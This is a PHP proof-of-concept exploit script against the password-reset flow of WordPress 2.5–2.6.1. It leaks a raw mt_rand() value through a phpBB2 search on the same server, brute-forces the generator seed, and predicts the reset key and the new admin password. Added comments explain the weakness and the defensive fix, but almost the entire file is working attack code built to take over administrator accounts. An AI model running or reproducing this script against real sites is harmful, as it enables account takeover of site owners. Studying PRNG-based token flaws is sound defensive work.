<?php
// Command-line proof-of-concept against the password-reset flow of the WordPress
// versions named in the banner. What the code below relies on, as far as this
// file shows: the reset key and the replacement password are produced with
// mt_rand() (see wp_generate_password() / wp26_generate_password() at the end of
// the file), a phpBB2 search on the same host echoes a raw mt_rand() value back as
// search_id, and the phpBB and WordPress requests travel over one keep-alive
// socket ($ock) - presumably so that the same PHP worker, and therefore the same
// generator state, serves both (inferred from the Connection headers; not
// verifiable from this file).
// Defender's notes: a token that unlocks an account must come from a CSPRNG
// (random_bytes() / random_int()), never from mt_rand() / rand(); raw PRNG output
// must not surface in user-visible identifiers such as search ids; and the only
// fix for the applications themselves is running a release newer than those
// listed in the banner.
echo "------------------------------------------------------------------\n";
echo "Wordpress 2.5 <= 2.6.1 through phpBB2 Reset Admin Password Exploit\n";
echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
echo "------------------------------------------------------------------\n";
// Usage text; fewer than two positional arguments aborts here.
if ($_SERVER['argc']<3) {
echo "USAGE:\n";
echo "~~~~~~\n";
echo "php {$_SERVER['argv'][0]} [wp] [phpbb] OPTIONS\n\n";
echo "[wp] - target server where Wordpress is installed\n";
echo "[phpbb] - path to phpBB (must be located on the same server)\n\n";
echo "OPTIONS:\n";
echo "--wp_user=[value] (default: admin)\n";
echo "--search=[value] (default: `site OR file`)\n";
echo "--skipcheck (force exploit not to compare PHP versions)\n";
echo "examples:\n";
echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://site.com/forum/\n";
echo "php {$_SERVER['argv'][0]} http://site.com/blog/ http://samevhost.com/forum/ --wp_user=lol\n";
die;
}
// No script time limit; every socket gets a 10 s read timeout.
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);
// Positional arguments: WordPress base URL, then phpBB base URL.
$wp = $_SERVER['argv'][1];
$phpbb = $_SERVER['argv'][2];
// Optional switches. Each value is split on '=' and only the second element is
// kept (list(, $x)), so a value that itself contains '=' is truncated there.
for($i=3;$i<$_SERVER['argc'];$i++){
if(strpos($_SERVER['argv'][$i],"--wp_user=")!==false) {
list(,$wp_user) = explode("=",$_SERVER['argv'][$i]);
}
if (strpos($_SERVER['argv'][$i],"--search=")!==false) {
list(,$search) = explode("=",$_SERVER['argv'][$i]);
}
if (strpos($_SERVER['argv'][$i],"--skipcheck")!==false) {
$skipcheck=true;
}
}
if(!isset($wp_user))$wp_user='admin';
if(!isset($search))$search='site OR file';
// Both URLs must carry a host and resolve to the same address. gethostbyname()
// returns its argument unchanged when resolution fails, so two unresolvable
// names still compare equal here.
$wp_parts = @parse_url($wp);
$phpbb_parts = @parse_url($phpbb);
if(isset($wp_parts['host']))$wp_ip = gethostbyname($wp_parts['host']);else die("[-] Wrong parameter given\n");
if(isset($phpbb_parts['host']))$phpbb_ip = gethostbyname($phpbb_parts['host']);else die("[-] Wrong parameter given\n");
if($wp_ip!=$phpbb_ip) die("[-] Web apps must be located on the same server\n");
// Normalise port (default 80) and path (trailing slash) for each application.
$phpbb_host = $phpbb_parts['host'];
if(isset($phpbb_parts['port']))$phpbb_port=$phpbb_parts['port']; else $phpbb_port=80;
if(isset($phpbb_parts['path']))$phpbb_path=$phpbb_parts['path']; else $phpbb_path="/";
if(substr($phpbb_path,-1,1)!="/")$phpbb_path .= "/";
$wp_host = $wp_parts['host'];
if(isset($wp_parts['port']))$wp_port=$wp_parts['port']; else $wp_port=80;
if(isset($wp_parts['path']))$wp_path=$wp_parts['path']; else $wp_path="/";
if(substr($wp_path,-1,1)!="/")$wp_path .= "/";
// Step 1: fetch wp-login.php over a plain HTTP/1.0 connection to the shared IP
// (the Host header selects the WordPress vhost). Only a 200 response is accepted;
// a versioned login.css link is taken as the 2.6 fingerprint and later selects
// which generator copy is replayed.
echo "[~] Connecting... ";
$sock = fsockopen($phpbb_ip,$phpbb_port);
if(!$sock)die("failed\n"); else echo "OK\n";
$packet = "GET {$wp_path}wp-login.php HTTP/1.0\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$resp='';
fputs($sock,$packet);
while(!feof($sock)) {
$resp.=fgets($sock);
}
fclose($sock);
if(preg_match('@HTTP/1\.(0|1) 200 OK@i',$resp)){
if(preg_match('@login\.css\?ver=([\d\.]+)\'@',$resp)) $wp26=true;
else $wp26=false;
} else die("[-] Can't obtain wp-login.php\n");
// Optional comparison of the server's PHP version (X-Powered-By header) with the
// local one. version_compare() returns -1/0/1, so each operand is truthy whenever
// the version differs from 5.2.6; the combined expression therefore aborts only
// when exactly one side equals 5.2.6 - an equality test, not an ordering check.
if(!isset($skipcheck)) {
echo "[~] Comparing PHP versions... ";
$out=array();
preg_match('@x-powered-by: *PHP/([\d\.]+)@i',$resp,$out);
if(!isset($out[1]))die( "failed\n[-] Can't get PHP version\n");
else {
if(!(version_compare($out[1],'5.2.6') && version_compare(phpversion(),'5.2.6')) && !(!version_compare($out[1],'5.2.6') && !version_compare(phpversion(),'5.2.6')) ) {
die("failed\n[-] Server's and local PHP versions are unacceptable\n");
}
}
echo "OK\n";
}
// Step 2: open the keep-alive socket ($ock, sic) and POST a phpBB search. The
// response is read line by line - each fgets() overwrites $resp - until a line
// carrying search_id appears; $search is reused here for the match array, which
// clobbers the CLI value (no longer needed). sleep(5) presumably leaves the server
// time to answer before the read loop starts.
$ock = fsockopen($phpbb_ip,$phpbb_port);
echo "[~] Sending request to $phpbb\n";
$data = "search_keywords=".urlencode($search)."&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200";
$packet = "POST {$phpbb_path}search.php?mode=results HTTP/1.1\r\n";
$packet.= "Host: {$phpbb_host}\r\n";
$packet.= "Connection: keep-alive\r\n";
$packet.= "Keep-alive: 300\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;
fputs($ock, $packet);
sleep(5);
$resp='';
while(!feof($ock)) {
$resp = fgets($ock);
preg_match('@search.php\?search_id=(\d+)&@',$resp,$search);
if(isset($search[1])) {
$search_id = (int)$search[1];
echo "[+] search_id is $search_id\n";
break;
}
}
if(!isset($search_id)) die("[-] search_id Not Found, try the other --search param\n");
// Step 3: on the same socket, submit the WordPress lost-password form for
// $wp_user. Its response is not read here; reading resumes in step 5.
echo "[~] Sending request to $wp\n";
$data = "user_login=".urlencode($wp_user)."&wp-submit=Get+New+Password";
$packet = "POST {$wp_path}wp-login.php?action=lostpassword HTTP/1.1\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: keep-alive\r\n";
$packet.= "Keep-alive: 300\r\n";
$packet.= "Referer: {$wp}/wp-login.php?action=lostpassword\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;
fputs($ock,$packet);
// Step 4: recover the seed whose first mt_rand() draw equals search_id, then
// replay the generator locally: reseed, discard that one draw, and produce the
// key the script expects WordPress to have generated. The 2.6 fingerprint selects
// the 20-character variant without punctuation; otherwise the 7-character one.
$seed = search_seed($search_id);
if($seed!==false) echo "[+] Seed is $seed\n";
else die("[-] Seed Not Found\n");
mt_srand($seed);
mt_rand();
if($wp26) $key = wp26_generate_password(20, false);
else $key = wp_generate_password();
echo "[+] Activation key should be $key\
";
// Step 5: request the reset page with the predicted key and read everything left
// on the socket (appended to the last line kept from step 2). Known English and
// Russian error strings indicate an unknown user name; error=invalidkey a wrong key.
echo "[~] Sending request to activate password reset\n";
$packet = "GET {$wp_path}wp-login.php?action=rp&key={$key} HTTP/1.1\r\n";
$packet.= "Host: {$wp_host}\r\n";
$packet.= "Connection: close\r\n\r\n";
fputs($ock,$packet);
while(!feof($ock)) {
$resp .= fgets($ock);
}
if(preg_match('/(Invalid username or e-mail)|(пользователь отсутствует в базе данных)|(Неправильное имя пользователя)/i',$resp)) die("[-] Incorrect username for wordpress\n");
if(strpos($resp,'error=invalidkey')!==false) die("[-] Activation key is incorrect\n");
// The replacement password is simply the next output of the same generator stream.
if($wp26) $pass = wp26_generate_password();
else $pass = wp_generate_password();
echo "[+] New password should be $pass\n";
function search_seed($rand_num) {
    // Find the mt_srand() seed whose first mt_rand() draw equals $rand_num.
    // Only seeds 0..1000000 are tried; returns the seed, or false when none
    // matches. Illustrates why mt_rand() output must never act as a secret:
    // the seed space is small enough to be searched exhaustively, so knowing a
    // single output is enough to reproduce every later one. A CSPRNG
    // (random_int()) has no recoverable seed.
    $limit = 1000000;
    $candidate = 0;
    while ($candidate <= $limit) {
        mt_srand($candidate);
        if (mt_rand() == $rand_num) {
            return $candidate;
        }
        $candidate++;
    }
    return false;
}
function wp26_generate_password($length = 12, $special_chars = true) {
    // Copy of the WordPress 2.6 key/password generator: $length characters drawn
    // with mt_rand() from an alphanumeric alphabet, extended with punctuation when
    // $special_chars is true. The only entropy is mt_rand()'s state, so anyone
    // who knows the seed reproduces the output exactly; random_int() over the
    // same alphabet would not have that property.
    $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    if ($special_chars) {
        $alphabet .= '!@#$%^&*()';
    }
    $lastIndex = strlen($alphabet) - 1;
    $result = '';
    $count = 0;
    while ($count < $length) {
        $result .= $alphabet[mt_rand(0, $lastIndex)];
        $count++;
    }
    return $result;
}
function wp_generate_password() {
    // Copy of the pre-2.6 WordPress generator: seven alphanumeric characters,
    // each chosen with mt_rand(0, 61). 62^7 candidates would be adequate from a
    // CSPRNG, but with mt_rand() the whole string is a pure function of the seed.
    $alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    $remaining = 7;
    $result = '';
    do {
        $result .= $alphabet[mt_rand(0, 61)];
        $remaining--;
    } while ($remaining > 0);
    return $result;
}
?>